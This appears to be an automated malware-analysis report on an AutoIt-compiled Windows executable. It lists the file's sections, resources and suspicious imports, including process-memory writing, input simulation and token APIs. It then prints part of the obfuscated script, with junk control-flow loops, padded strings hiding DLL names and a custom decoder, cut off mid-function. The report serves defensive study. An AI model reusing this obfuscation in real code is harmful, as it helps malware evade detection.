.text	0x1000	0x8dfdd	0x8e000	False	0.583319005832	data	6.71971878034	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	False	0.328288185379	data	5.76324400576	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	False	0.10175304878	data	1.19638192355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xc8000	0x47cbc	0x47e00	False	0.908023097826	data	7.84935069972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x110000	0x7134	0x7200	False	0.761753015351	data	6.78395555713	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xc85e8	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc8710	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc8838	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc8960	0x2e8	data	English	Great Britain
RT_ICON	0xc8c48	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc8d70	0xea8	data	English	Great Britain
RT_ICON	0xc9c18	0x8a8	dBase III DBT, version number 0, next free block index 40	English	Great Britain
RT_ICON	0xca4c0	0x568	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xcaa28	0x25a8	dBase III DBT, version number 0, next free block index 40	English	Great Britain
RT_ICON	0xccfd0	0x10a8	data	English	Great Britain
RT_ICON	0xce078	0x468	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_MENU	0xce4e0	0x50	data	English	Great Britain
RT_STRING	0xce530	0x594	data	English	Great Britain
RT_STRING	0xceac4	0x68a	data	English	Great Britain
RT_STRING	0xcf150	0x490	data	English	Great Britain
RT_STRING	0xcf5e0	0x5fc	data	English	Great Britain
RT_STRING	0xcfbdc	0x65c	data	English	Great Britain
RT_STRING	0xd0238	0x466	data	English	Great Britain
RT_STRING	0xd06a0	0x158	data	English	Great Britain
RT_RCDATA	0xd07f8	0x2bef0	data
RT_RCDATA	0xfc6e8	0x13052	data
RT_GROUP_ICON	0x10f73c	0x76	data	English	Great Britain
RT_GROUP_ICON	0x10f7b4	0x14	data	English	Great Britain
RT_GROUP_ICON	0x10f7c8	0x14	data	English	Great Britain
RT_GROUP_ICON	0x10f7dc	0x14	data	English	Great Britain
RT_VERSION	0x10f7f0	0xdc	data	English	Great Britain
RT_MANIFEST	0x10f8cc	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Static AutoIT Info

General

Code:

LOCAL $NSFYZHFKYP = EXECUTE LOCAL $EOERUAQRJSKN = $NSFYZHFKYP ("DllStructGetData" ) LOCAL $DWUFUAPKESAJ = $NSFYZHFKYP ("BinaryToString" ) FUNC LUXBZMCWKPOC ($STEXT , $SYMBOL ) GLOBAL $1300820860 = 256356752 GLOBAL $MIFHIFVYOW = 1654813 FOR $E = 0 TO 1029680 IF $1300820860 = 176683708 THEN RETURN $RESULT WINEXISTS ("cNl3R229gAzqAgEuzKzVWCOcVIa32WhXtsmSQFEqNhbfvHYqV7k4qjZJ9iii19hutL7h3WO4f" ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $RESULT = STRINGREPLACE ($STEXT , $SYMBOL , "" ) ISBOOL (818823 * 493411 * 2406282 + 2130956 ) $1300820860 = 176683708 ISSTRING ("yNaRVUKQw8rqYhclizB6xh2lTgeXOqeiGTUCNTY6Kewi" ) ENDIF STRING ("rDseA9qWY8OOX" ) NEXT ENDFUNC FUNC EWYPFYGPXIKHY ($IMGFULLPATH ) GLOBAL $1138660241 = 256356752 GLOBAL $G4JUFXIGZL = 90924 FOR $E = 0 TO 2054991 IF $1138660241 = 113519199 THEN GUIDELETE ($HWND ) ISBOOL ("OQwXVdfTCRZVjrYdqoDJsbHUeRIgQEdpJ59hNsifNw42SNBnFpEDeYANiLTeE8c7MJknrRy7fy66gOczouJAaI" ) $1138660241 = 1027989821 RANDOM (130856 ) ENDIF IF $1138660241 = 176683708 THEN $HWND = GUICREATE ($IMGFULLPATH , 0 , 0 , 0 , 0 , BITOR (2147483648 , 536870912 ) , BITOR (128 , 32 ) ) ISBOOL (1265171 + 520477 + 4293992654 * 3327821 ) $1138660241 = 1300820860 CHR (2730490 ) ISBOOL ("sZkxL7eyyS6SwwaYpLjA469yVJCkE4aYFBqozrSakTdG9hDkx2L2xcQv0WMbD34ERil4f" ) ENDIF IF $1138660241 = 256356752 THEN LOCAL $HWND , $HGUISWITCH , $ACTRLSIZE , $ARETSIZE [2 ] = [0 , 0 ] RANDOM (3641423 ) $1138660241 = 176683708 ENDIF IF $1138660241 = 1027989821 THEN GUISWITCH ($HGUISWITCH ) EXITLOOP INT (3107136 ) ENDIF IF $1138660241 = 1203322726 THEN $ACTRLSIZE = CONTROLGETPOS ($HWND , "" , GUICTRLCREATEPIC ($IMGFULLPATH , 0 , 0 , 0 , 0 ) ) DIM $DW5YMNQFQYI005IELCM7 = 964435 * 1963137 + 4293423702 + 4294948098 $1138660241 = 113519199 DIM $RNHTSIKWVTNM8WTLIRGN = 647030 ENDIF IF $1138660241 = 1300820860 THEN $HGUISWITCH = GUISWITCH ($HWND ) $1138660241 = 1203322726 CHR (45484 ) ENDIF DIM $URHNA3OSSULYHJVXSX77 = 600218 + 4293462533 + 4294915318 * 2918734 + 4292984733 NEXT IF ISARRAY ($ACTRLSIZE ) THEN GLOBAL $1203322726 = 256356752 GLOBAL $CSY08UBDGU = 2740256 FOR $E = 0 TO 3691754 IF $1203322726 = 176683708 THEN $ARETSIZE [1 ] = $ACTRLSIZE [3 ] $1203322726 = 1300820860 INT (967164 ) ENDIF IF $1203322726 = 256356752 THEN $ARETSIZE [0 ] = $ACTRLSIZE [2 ] $1203322726 = 176683708 ISBOOL ("k2nLrtaqkAvZrMcSm68iRAhbvf6LDlz2qGkcnTjp23hXhFfTjNJ8Ke3TUlqlxxW8bCIV" ) ENDIF IF $1203322726 = 1300820860 THEN RETURN SETERROR (0 , 0 , $ARETSIZE ) EXITLOOP ENDIF MOD (3165406 , 1234085 ) NEXT ENDIF RETURN SETERROR (1 , 0 , $ARETSIZE ) ENDFUNC FUNC VRCRUWMXTTRH ($SSTRING , $IREPEATCOUNT ) $IREPEATCOUNT = INT ($IREPEATCOUNT ) IF STRINGLEN ($SSTRING ) < 1 OR $IREPEATCOUNT < 0 THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $SRESULT = "" WHILE $IREPEATCOUNT > 1 IF BITAND ($IREPEATCOUNT , 1 ) THEN $SRESULT &= $SSTRING GLOBAL $1300820860 = 256356752 GLOBAL $3Z9MCZLBRL = 1285316 FOR $E = 0 TO 2581845 IF $1300820860 = 176683708 THEN $IREPEATCOUNT = BITSHIFT ($IREPEATCOUNT , 1 ) EXITLOOP ISSTRING ("WO7uqjjfl1YfzArAm" ) ENDIF IF $1300820860 = 256356752 THEN $SSTRING &= $SSTRING $1300820860 = 176683708 ISBOOL ("gcRCcY1WQjHo2O6sQGpzxHa1TaVRJjXmCJnnCQdx9cz" ) ENDIF NEXT WEND RETURN $SSTRING & $SRESULT ENDFUNC FUNC QNJARTBHRDOXE ($SSTR ) GLOBAL $1300820860 = 256356752 GLOBAL $OKQZTV9IBZ = 2183390 FOR $E = 0 TO 2966495 IF $1300820860 = 176683708 THEN LOCAL $SDECODED , $R , $RS = 8 , $LS = 7 , $ASTR = STRINGSPLIT ($SSTR , "" , 2 ) EXITLOOP STRING (1180918 * 3350956 + 1885337 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $SB128 = LUXBZMCWKPOC ("!#..$%..(..)*..,...012345..6..7..89..:..;..=@A..BC..DEFG..H..IJ..K..LMNO..PQRST..U..V..WX..YZ[]^.._..a..bcd..e..f..g..h..i..j..kl..m..n..opqrs..t..u..v..wxy..z..{..|..}~............................................................................................................................................................................................." , ".." ) STRING ("8QBnB8372SKOmN6buZ033HrqhFVqvBuNzq0dJZSnMyCcRVFleBGKEo0Axlg6mMKzx7o5X2BEhMqEfoIvaIm44UilA" ) $1300820860 = 176683708 ENDIF DIM $XCOTFJYLACD17VUJLU5M = "QENYdEwmcVuLqRcI0Zzka42qqnefFX90xJhGb5Cfc97ripROrJV" NEXT FOR $I = 0 TO UBOUND ($ASTR ) + 4294967295 $NC = STRINGINSTR ($SB128 , $ASTR [$I ] , 1 ) + 4294967295 IF $RS > 7 THEN GLOBAL $113519199 = 256356752 GLOBAL $ECZWMWGZZR = 3669754 FOR $E = 0 TO 2777370 IF $113519199 = 176683708 THEN $LS = 7 $113519199 = 1300820860 ISSTRING (3678465 + 4294436102 + 3801172 ) DIM $FYX5BEV5JU4NXMOURSFM = "afWc" ENDIF IF $113519199 = 256356752 THEN $RS = 1 DIM $YZCPFSAEVNRJSFOK3GTQ = 1543249 * 941265 + 1972212 * 2045070 $113519199 = 176683708 ISSTRING ("VF1y1uNpGEYDTD1litZD6OJ8UGXRD2cl7SUTTDOybimUpapbCZU1QRNg52NuG7VOBMFaTh" ) ENDIF IF $113519199 = 1203322726 THEN CONTINUELOOP EXITLOOP ISSTRING (1831278 * 2990306 + 3098707 + 2657297 ) ENDIF IF $113519199 = 1300820860 THEN $R = $NC $113519199 = 1203322726 ENDIF PTR ("dwHsMDpruxfnpnZNej4eVTfGphp6fuKZtIyA4HgqbD3rc8oco9TR5pgtqbcEoslaWq3RZyUGdNdq0YDr3mRgL33dCej3ELbSs3EWeHn" ) NEXT ENDIF GLOBAL $1138660241 = 256356752 GLOBAL $PLNRM0DCGV = 3367680 FOR $E = 0 TO 2441690 IF $1138660241 = 113519199 THEN $LS -= 1 $1138660241 = 1027989821 PTR ("o0bBLu87sSmu910zoK1MKRwU9agmELyotDLykmQ11FjZIqcUp8NW8KiGDrBLnVCRs7aEpApc49VeHHkS7w7F7MpS" ) ENDIF IF $1138660241 = 176683708 THEN $NC = BITOR (BITAND (BITSHIFT ($NC , ($LS * + 4294967295 ) ) , 255 ) , $R ) ISPTR ("gdBFKqGDYTK190e95gTN1Y6UQSrkkEwr0vNafbJBz2iXvVp2qf9WbzWsgS038wtsvsbNmd34Gqo8" ) $1138660241 = 1300820860 STRING (1775845 * 313793 + 4292565921 ) ENDIF IF $1138660241 = 256356752 THEN $R1 = $NC WINEXISTS ("lRCcI0AdULOmmfoUlYN7u5BICoYUcKf1jES0YlyZSukZUR" ) $1138660241 = 176683708 STRING (983529 * 3767196 + 1033300 + 3599162 ) DIM $RAJGYDRXY69YZP9VLZWW = "yFvujmBBK4LeWbtas5Mkb7Jpv2RdEMeX7MrEYlO0p5Ybwtcn" ENDIF IF $1138660241 = 1027989821 THEN $SDECODED &= CHR ($NC ) INT (3550800 ) EXITLOOP ENDIF IF $1138660241 = 1203322726 THEN $RS += 1 $1138660241 = 113519199 RANDOM (1102076 ) RANDOM (3872667 ) ENDIF IF $1138660241 = 1300820860 THEN $R = BITSHIFT ($R1 , $RS ) DIM $ITZMGQX4GII3B0CXUTLN = 3074305 $1138660241 = 1203322726 MOD (1548419 , 1295973 ) ENDIF PTR ("m3E0GmLvrqswm7Ad9mNMlv22qE42CciswvZ67HmgJrDaHlFp6q2UlHv1bMJcsT3o" ) NEXT NEXT RETURN $SDECODED ENDFUNC FUNC YDFTDRCASVG ($BBINARY ) GLOBAL $1300820860 = 256356752 GLOBAL $9A1HEFBAHD = 506265 FOR $E = 0 TO 3591842 INT (321663 ) IF $1300820860 = 176683708 THEN #forceref $j RANDOM (801978 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN LOCAL $BYTE , $BITS = "" , $I , $J , $S $1300820860 = 176683708 WINEXISTS ("8jY0yp2HkNhBkzUNEB9isEeNXReU2m1jIVD0TnEL" ) WINEXISTS ("GDbUMCtG8WbCfkcSliO8X73y645q7xjGKUgtOtg" ) ENDIF NEXT FOR $I = 1 TO BINARYLEN ($BBINARY ) $BYTE = BINARYMID ($BBINARY , $I , 1 ) FOR $J = 1 TO 8 GLOBAL $1300820860 = 256356752 GLOBAL $LWTAUHLXZ0 = 1321153 FOR $E = 0 TO 402326 ISBOOL (2500246 * 2195127 + 2309758 + 4292466555 ) IF $1300820860 = 176683708 THEN $BYTE = BITSHIFT ($BYTE , 1 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $BITS &= BITAND ($BYTE , 1 ) WINEXISTS ("pfCVg" ) $1300820860 = 176683708 DIM $EK7SAQMGUBEW1ZUKJOHX = 1909697 + 4292022810 + 4291720625 * 3293847 ENDIF NEXT NEXT NEXT GLOBAL $1300820860 = 256356752 GLOBAL $IK8YLTDMIH = 3543418 FOR $E = 0 TO 3884059 IF $1300820860 = 176683708 THEN $BITS = "" MOD (2826006 , 668109 ) EXITLOOP ISPTR (3576399 + 4293328620 + 4292596178 ) ENDIF IF $1300820860 = 256356752 THEN $S = STRINGSPLIT ($BITS , "" ) ISFLOAT ("LXR1v80k5" ) $1300820860 = 176683708 DIM $BIWNFFFXRX8MZCVAZS6U = 3473510 * 1622827 + 4294219104 ENDIF NEXT FOR $I = $S [0 ] TO 1 STEP + 4294967295 $BITS &= $S [$I ] NEXT RETURN $BITS ENDFUNC FUNC IZSPTCBUQOIXMP ($SSTRING , $INUMCHARS ) IF ISSTRING ($SSTRING ) = 0 OR $SSTRING == "" THEN RETURN SETERROR (1 , 0 , 0 ) ENDIF IF ISINT ($INUMCHARS ) = 0 OR $INUMCHARS < 1 THEN RETURN SETERROR (2 , 0 , 0 ) ENDIF GLOBAL $1203322726 = 256356752 GLOBAL $G7FSNVIRVE = 3481575 FOR $E = 0 TO 2975631 DIM $YDWVASINGXWAQVJABYON = "trp9CudpU7wn1r59zgHss0r6WexiVMuus" IF $1203322726 = 176683708 THEN $ARETURN [0 ] = UBOUND ($ARETURN , 1 ) + 4294967295 DIM $WHXF8W0ZNYCNACSQ58DA = 1274644 + 1579368 $1203322726 = 1300820860 ISSTRING ("c4imT2NIkXtCBGIO44UKbNxUKlXIiAJCpnwsqpEhxUFiOaHXNTcaVFKyFxKHfezUm0mojpyOzLm" ) ENDIF IF $1203322726 = 256356752 THEN LOCAL $ARETURN = STRINGREGEXP (_STRINGREPEAT ("0" , 5 ) & $SSTRING , "(?s).{1," & $INUMCHARS & "}" , 3 ) $1203322726 = 176683708 DIM $5ZXISUL8W2N6CTUV5YXT = "xtxKittqqsa4fj9wMhCLkDGaCJ36wtrXtwGga8IAsSFINc6jvxsQtRC4XxiIzw36bmKTL3vOIctC" STRING ("TK9bKCL4MtMZaa5ZIHABnHCbMhrxa6ZaS6RW45zT9Z8ITZHcxMyy59zkh7xCln4QDLhdsi5NhRB" ) ENDIF IF $1203322726 = 1300820860 THEN RETURN $ARETURN EXITLOOP PTR (980617 + 4292796468 + 4294635977 * 2096956 ) ENDIF RANDOM (2144716 ) NEXT ENDFUNC FUNC MIJWHARLJCMZNKU ($SHEX ) IF NOT (STRINGLEFT ($SHEX , 2 ) == "0x" ) THEN $SHEX = "0x" & $SHEX RETURN $DWUFUAPKESAJ ($SHEX ) ENDFUNC FUNC XHLXVVVZBP ($ICOLOR ) GLOBAL $1203322726 = 256356752 GLOBAL $HV5SFHSETP = 3798929 FOR $E = 0 TO 2841645 MOD (2100624 , 98488 ) IF $1203322726 = 176683708 THEN $IMASK = BITXOR (BITAND ($ICOLOR , 255 ) , ($ICOLOR / 65536 ) ) ISBINARY (3623704 + 2147057 + 222595 + 4293365621 ) $1203322726 = 1300820860 ISSTRING (414661 + 2806808 ) ENDIF IF $1203322726 = 256356752 THEN LOCAL $IMASK DIM $EFUOWI1ME3ZR7CKFXJCJ = 1218598 $1203322726 = 176683708 ISPTR (2630247 + 3293816 ) CHR (1904096 ) ENDIF IF $1203322726 = 1300820860 THEN RETURN BITXOR ($ICOLOR , ($IMASK * 65537 ) ) EXITLOOP ENDIF WINEXISTS ("mc3fQjiIlegVKXgJ95hcWw6H8YCmjbEXh4g5cOcE7ENDoQ2QT1E7o13Zfug2Q5yjJtMQRlGt2LeqTCtr5" ) NEXT ENDFUNC FUNC NBRNBWYUQNWGOKZ ($HICON1 , $HICON2 ) LOCAL $ARTN = DLLCALL (LUXBZMCWKPOC ("s..hl..wa..pi...d..l..l" , ".." ) , LUXBZMCWKPOC ("B..OO..L.." , ".." ) , 548 , LUXBZMCWKPOC ("h..a..nd..le.." , ".." ) , $HICON1 , LUXBZMCWKPOC ("h..a..nd..le.." , ".." ) , $HICON2 ) IF @ERROR THEN RETURN SETERROR (@ERROR ) ENDIF RETURN $ARTN [0 ] ENDFUNC FUNC ZFVYVFHKBGEU ($IINT ) LOCAL $B = "" FOR $I = 1 TO 32 GLOBAL $1300820860 = 256356752 GLOBAL $DSFHHQARZS = 3139047 FOR $E = 0 TO 2229963 IF $1300820860 = 176683708 THEN $IINT = BITSHIFT ($IINT , 1 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $B = BITAND ($IINT , 1 ) & $B DIM $GTLELWLFMBZ63AFMBVWQ = 1652337 + 4291679370 * 2824548 * 170358 + 980145 + 4293331830 + 2944568 * 3810742 $1300820860 = 176683708 ISSTRING (1939181 + 790819 * 2905706 ) ENDIF PTR (580007 + 4292640990 + 2010750 + 4293480249 ) NEXT NEXT RETURN $B ENDFUNC FUNC DUWYGWWFUHRY ($ILENGTH ) RETURN $ILENGTH * 0.621400 ENDFUNC FUNC RQNMBRDSQSVPAPI ($SSTRING ) GLOBAL $1300820860 = 256356752 GLOBAL $UB0DLKMGDG = 3335599 FOR $E = 0 TO 1170343 WINEXISTS ("nkhcC1BjxRqHnmWD4ggU6uifhbZg4ItsYo" ) IF $1300820860 = 176683708 THEN LOCAL $AVRETARR [1 ] , $IUBOUND EXITLOOP ENDIF IF $1300820860 = 256356752 THEN LOCAL $AVARRAY = STRINGREGEXP ($SSTRING , "([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)" , 3 ) INT (1214044 ) $1300820860 = 176683708 ENDIF ISFLOAT (1498587 * 535529 + 4291431968 ) NEXT FOR $I = 0 TO UBOUND ($AVARRAY ) + 4294967295 IF _ISVALIDIP ($AVARRAY [$I ] ) THEN GLOBAL $1203322726 = 256356752 GLOBAL $C4BBUOYW7T = 130051 FOR $E = 0 TO 3905436 DIM $GMHBM2VUEC6YRL1JQ3C8 = 1298284 IF $1203322726 = 176683708 THEN REDIM $AVRETARR [$IUBOUND + 1 ] $1203322726 = 1300820860 DIM $NAXTAC5F0PLQSAQSZYF5 = "MEwdfxXWdUjDIoUvVb3DVvL79kCRaNd2cgbEap5OhTXFBliVG7ewlBlq3ze44gVyRrBCnouEgovcHfEXbSkdIQQK5ULKlaUb7xYkUQGrMJq7fjTX4q" RANDOM (2856720 ) ENDIF IF $1203322726 = 256356752 THEN $IUBOUND = UBOUND ($AVRETARR ) ISBINARY (2174494 + 4292023633 + 353925 ) $1203322726 = 176683708 ENDIF IF $1203322726 = 1300820860 THEN $AVRETARR [$IUBOUND ] = $AVARRAY [$I ] EXITLOOP ENDIF NEXT ENDIF NEXT IF $IUBOUND = 0 THEN RETURN SETERROR (1 , 0 , 0 ) GLOBAL $1300820860 = 256356752 GLOBAL $9YSEVBYQ4H = 1704866 FOR $E = 0 TO 2205646 IF $1300820860 = 176683708 THEN RETURN $AVRETARR ISBOOL (560610 + 4291396930 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $AVRETARR [0 ] = 